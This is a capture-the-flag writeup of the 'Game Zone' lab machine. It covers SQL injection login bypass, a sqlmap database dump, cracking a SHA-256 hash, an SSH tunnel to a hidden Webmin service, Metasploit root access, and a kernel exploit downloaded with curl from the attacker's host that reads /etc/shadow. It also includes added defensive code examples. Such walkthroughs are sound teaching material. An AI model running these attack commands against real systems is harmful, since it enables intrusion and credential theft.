Advanced_Exploitation--Game_Zone Writeup

OffensivePentesting.ctd

Game Zone

images/47-1.png

Learn to hack into this machine. Understand how to use SQLMap, crack some passwords, reveal services using a reverse SSH tunnel and escalate your privileges to root!




Recon

nmap -sV -sC -T4 -Pn 10.10.25.213
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-29 19:27 PKT
Nmap scan report for 10.10.25.213
Host is up (4.0s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:  
|   2048 61:ea:89:f1:d4:a7:dc:a5:50:f7:6d:89:c3:af:0b:03 (RSA)
|   256 b3:7d:72:46:1e:d3:41:b6:6a:91:15:16:c9:4a:a5:fa (ECDSA)
|_  256 53:67:09:dc:ff:fb:3a:3e:fb:fe:cf:d8:6d:41:27:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Game Zone
| http-cookie-flags:  
|   /:  
|     PHPSESSID:  
|_      httponly flag not set
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.08 seconds

Obtain access via SQLi



images/48-1.png

+

images/48-2.png

Using Burp Intruder And Turbo Intruder Extension




Turbo Intruder



This extension is useful if you do not have Burp Pro.

Moreover, it is much faster than Burp Intruder.

Here is how I started fuzzing the login form with the SQL injection wordlist using Turbo Intruder:

images/48-3.png



Here is the output:


images/48-4.png


A 302 redirect was received instead of the "incorrect password" response, which tells us that payload bypassed the login check.





Burp Intruder



images/48-5.png


Here is the output:


images/48-6.png






So we have found a SQL injection. Let's try to get a shell via SQLMap.
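An added example (not code from the room or from this writeup) of why the 302 appeared: a login query built by string concatenation beside the parameterised form that closes the hole, with an in-memory SQLite table as a constructed stand-in for the site's MySQL users table. The payload, the table layout and the stored SHA-256 hash are assumptions.

```python
import hashlib
import sqlite3


def sha256_hex(word: str) -> str:
    return hashlib.sha256(word.encode()).hexdigest()


def build_db() -> sqlite3.Connection:
    """Constructed stand-in for the site's users table: username plus unsalted SHA-256 hash."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, pwd TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("agent47", sha256_hex("videogamer124")))
    conn.commit()
    return conn


def login_vulnerable(conn, username: str, password: str):
    """Query built by string formatting: whatever is typed in the username box becomes SQL."""
    sql = (f"SELECT username FROM users WHERE username='{username}' "
           f"AND pwd='{sha256_hex(password)}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_hardened(conn, username: str, password: str):
    """Parameterised query: the driver binds input as data, so quotes and comments are inert."""
    sql = "SELECT username FROM users WHERE username=? AND pwd=?"
    row = conn.execute(sql, (username, sha256_hex(password))).fetchone()
    return row[0] if row else None


def http_outcome(user):
    """The signal the writeup keyed on in Intruder: 302 to portal.php on success, else the error page."""
    return "302 -> portal.php" if user else "200 incorrect password"


if __name__ == "__main__":
    payload = "' or 1=1 -- -"  # constructed example of the kind of string the wordlist contains
    db = build_db()
    print("vulnerable:", http_outcome(login_vulnerable(db, payload, "anything")))
    print("hardened:  ", http_outcome(login_hardened(db, payload, "anything")))
```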





SQLmap




We will try to get a shell using SQLMap.

After the login bypass we were redirected to portal.php.

images/48-7.png



We will use its game review search parameter as the injection point.

A simple way to do it is to capture the whole request with Burp, save it as a .txt file and use this command (set --dbms only if you already know the backend):

sqlmap -r req.txt --dbms=<dbms-if-known> --os-shell






This did not work.

Using SQLMap




We're going to use SQLMap to dump the entire database for GameZone.

Using the page we logged into earlier, we're going to point SQLMap at the game review search feature.

First we need to intercept a request made to the search feature using BurpSuite.

images/50-1.png


Save this request into a text file. We can then pass this into SQLMap to use our authenticated user session.


images/50-2.png

-r uses the intercepted request you saved earlier

--dbms tells SQLMap what type of database management system it is

--dump attempts to output the entire database


images/50-3.png


SQLMap will now try different methods and identify the one that's vulnerable. Eventually, it will output the database.







We have dumped the database.

Here is the useful part of the output:

images/50-4.png

You can use crackstation.net and crack this hash immediately,

but we will try to crack it with John and with Hashcat.

Cracking a password with JohnTheRipper



John the Ripper (JTR) is a fast, free and open-source password cracker.


John the Ripper is 15 years old, and there are several other cracking programs out there, such as Hashcat.


This program works by taking a wordlist, hashing it with the specified algorithm and then comparing it to your hashed password. If both hashed passwords are the same, it means it has found it. You cannot reverse a hash, so it needs to be done by comparing hashes.
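An added example (not code from the writeup, John or Hashcat) of the wordlist comparison described above, beside the storage scheme that defeats it: a per-user random salt plus a slow KDF. The mini wordlist is constructed; PBKDF2 with 100,000 iterations is an assumption about a reasonable hardened setting, not something the room uses.

```python
import hashlib
import hmac
import os
from typing import Iterable, Optional, Tuple


def sha256_hex(word: str) -> str:
    return hashlib.sha256(word.encode()).hexdigest()


def crack_raw_sha256(target_hex: str, wordlist: Iterable[str]) -> Optional[str]:
    """What john --format=Raw-SHA256 / hashcat -m 1400 do: hash each candidate, compare digests."""
    target = target_hex.strip().lower()
    for word in wordlist:
        if sha256_hex(word) == target:
            return word
    return None


# Hardened storage for comparison: random per-user salt plus a slow KDF. Each guess now costs
# ITERATIONS hashes per user, and precomputed lookup tables (crackstation-style) no longer apply.
ITERATIONS = 100_000  # assumed setting, not the room's


def store_password(password: str) -> Tuple[bytes, bytes]:
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest


def verify_password(password: str, salt: bytes, digest: bytes) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(candidate, digest)  # constant-time comparison


if __name__ == "__main__":
    # The hash dumped in this writeup; the constructed mini wordlist stands in for rockyou.txt.
    page_hash = "ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14"
    print(crack_raw_sha256(page_hash, ["password", "gamer", "videogamer124"]))
    salt, digest = store_password("videogamer124")
    print(verify_password("videogamer124", salt, digest), verify_password("guess", salt, digest))
```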


Cracking



The Hash
ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14


john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=sha256crypt

This did not work: the hash is a raw SHA-256 digest, not sha256crypt.


john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256


hash.txt - contains a list of your hashes (in your case it's just one hash)
--wordlist - is the wordlist you're using to find the dehashed value
--format - is the hashing algorithm used. In our case it's hashed using SHA256.


This worked:

images/51-1.png





Cracking Password with Hashcat Just for Practice



The Hash
ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14


First we have to identify the hash type. There are built-in hash analyzers, but let's do it from the Internet:

images/52-1.png


https://www.tunnelsup.com/hash-analyzer/

https://crackstation.net/ can directly crack the password for you.



Cracking



hashcat -m 1400 --attack-mode 0 hash.txt /usr/share/wordlists/rockyou.txt

As we know the hash type is raw SHA-256, we used -m 1400.



images/52-2.png



Done. The cracked password is:

videogamer124

Exposing services with reverse SSH tunnels



ssh agent47@10.10.99.169

Password: videogamer124

images/53-1.png

Reverse SSH port forwarding specifies that the given port on the remote server host is to be forwarded to the given host and port on the local side.
-L is a local tunnel (YOU <-- CLIENT). If a site was blocked, you can forward the traffic to a server you own and view it. For example, if imgur was blocked at work, you can do ssh -L 9000:imgur.com:80 user@example.com. Going to localhost:9000 on your machine will load imgur traffic through your other server.
-R is a remote tunnel (YOU --> CLIENT). You forward your traffic to the other server for others to view. Similar to the example above, but in reverse.




Reverse SSH tunneling enables you to access remote machines behind NAT. For instance, you can access your office from home. In other words, reverse SSH tunneling is a technique that enables you to SSH into a Linux-based system that doesn't have a public IP address.

Remote port forwarding (reverse tunneling) Also often called SSH reverse tunneling, remote port forwarding redirects the remote server's port to the localhost's port. When remote port forwarding is used, at first, the client connects to the server with SSH.


Steps




We will use a tool called ss to investigate sockets running on a host.

If we run ss -tulpn it will tell us what socket connections are running.

Argument   Description
-t         Display TCP sockets
-u         Display UDP sockets
-l         Display only listening sockets
-p         Show the process using the socket
-n         Don't resolve service names



What are Sockets?

(External note)

Definition: A socket is one endpoint of a two-way communication link between two programs running on the network. A socket is bound to a port number so that the TCP layer can identify the application that data is destined to be sent to. An endpoint is a combination of an IP address and a port number.

A network socket is one endpoint in a communication flow between two programs running over a network. Sockets are created and used with a set of programming requests or "function calls" sometimes called the sockets application programming interface (API).

(End of external note)





We can see that a service running on port 10000 is blocked from the outside by a firewall rule (visible in the iptables list). However, using an SSH tunnel we can expose the port to ourselves locally.


From our local machine, run ssh -L 10000:localhost:10000 <username>@<ip>


Once complete, in your browser type "localhost:10000" and you can access the newly-exposed webserver.
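An added example (not code from the writeup or the room) that parses ss -tulpn output and lists the listeners the nmap scan never saw, which are exactly the candidates for a tunnel like the one above. The sample output is constructed to resemble the room's host; the process names and PIDs are assumptions.

```python
import re
from dataclasses import dataclass
from typing import List, Set

# Constructed sample of `ss -tulpn` output (not a real capture from the machine).
SAMPLE_SS = """\
Netid State  Recv-Q Send-Q  Local Address:Port   Peer Address:Port  Process
tcp   LISTEN 0      128     0.0.0.0:22           0.0.0.0:*          users:(("sshd",pid=888,fd=3))
tcp   LISTEN 0      128     127.0.0.1:3306       0.0.0.0:*          users:(("mysqld",pid=950,fd=10))
tcp   LISTEN 0      128     0.0.0.0:10000        0.0.0.0:*          users:(("perl",pid=1001,fd=6))
tcp   LISTEN 0      128     *:80                 *:*                users:(("apache2",pid=1100,fd=4))
udp   UNCONN 0      0       0.0.0.0:10000        0.0.0.0:*          users:(("perl",pid=1001,fd=5))
tcp   LISTEN 0      128     [::]:22              [::]:*             users:(("sshd",pid=888,fd=4))
"""

PROC_RE = re.compile(r'users:\(\("([^"]+)",pid=(\d+)')


@dataclass(frozen=True)
class Listener:
    proto: str
    addr: str
    port: int
    process: str
    pid: int


def parse_ss(output: str) -> List[Listener]:
    listeners = []
    for line in output.splitlines()[1:]:          # skip the header row
        fields = line.split()
        if len(fields) < 5:
            continue
        proto, state, local = fields[0], fields[1], fields[4]
        if proto == "tcp" and state != "LISTEN":  # only bound/listening sockets matter here
            continue
        addr, _, port = local.rpartition(":")     # rpartition keeps IPv6 "[::]" intact
        if not port.isdigit():
            continue
        m = PROC_RE.search(line)
        name, pid = (m.group(1), int(m.group(2))) if m else ("?", 0)
        listeners.append(Listener(proto, addr, int(port), name, pid))
    return listeners


def hidden_services(output: str, externally_open: Set[int]) -> List[Listener]:
    """Listeners the host has but the outside scan never showed: loopback-bound or firewalled."""
    return sorted({s for s in parse_ss(output) if s.port not in externally_open},
                  key=lambda s: (s.port, s.proto))


if __name__ == "__main__":
    for s in hidden_services(SAMPLE_SS, {22, 80}):  # 22 and 80 are what nmap saw from outside
        print(f"{s.proto}/{s.port} on {s.addr} ({s.process}, pid {s.pid}) -> tunnel candidate")
```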



CMS



A Content Management System (CMS) is a web application used to manage content on a website: for example blogs, news sites, e-commerce sites and more.

A CMS is a software platform used to handle changes in website content, enabling multiple authors to develop, update, and publish material.





Got the CMS login page.



Credentials accepted: user = agent47, pass = videogamer124

images/53-2.png


You can log in with the agent47 credentials; the page then exposes some system info and the server version.


images/53-3.png



Now it's time to search for potential exploits for this version and these specs (kernel etc.).






Priv Esc with Metasploit



https://www.rapid7.com/db/modules/exploit/unix/webapp/webmin_show_cgi_exec/

The options that I have set

images/54-1.png




Just run it and you will get a reverse shell with root privileges.

Priv Esc without Metasploit (Failed)




images/56-1.png

We also got some info from the Content Management System (CMS):

images/56-2.png



Found this exploit:

https://www.exploit-db.com/exploits/47169


images/56-3.png


The usage (snipped from the exploit's source comments):



// Usage:
// user@ubuntu:~$ uname -a
// Linux ubuntu 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
// user@ubuntu:~$ whoami
// user
// user@ubuntu:~$ id
// uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
// user@ubuntu:~$ gcc pwn.c -o pwn
// user@ubuntu:~$ ./pwn
// [.] starting
// [.] checking kernel version
// root@ubuntu:/home/user# whoami
// root
// root@ubuntu:/home/user# id
// uid=0(root) gid=0(root) groups=0(root)
// root@ubuntu:/home/user# cat /etc/shadow




Time to Exploit




The compiled exploit is served from http://10.8.41.9:8000/pwn and fetched with curl.

- Download a file, saving the output under the filename indicated by the URL:
   curl --remote-name http://example.com/filename

images/56-4.png


Let's run it:

images/56-5.png


Failed.

It should work on another system with this kernel name.

Maybe it has a different kernel; the machine authors may have changed its kernel name to a fake one, so this would be a time-wasting rabbit hole.



I have tried all the methods taught by THM in the Jr Penetration Tester path and nothing worked, which means there is only one priv esc vector: it can be achieved with Metasploit or any other exploit that takes advantage of the vulnerable version of the CMS server.

Other Interesting Things


images/57-1.png


Database password: 3kSMMS47qZEBgFUe


images/57-2.png




Useful

images/57-3.png

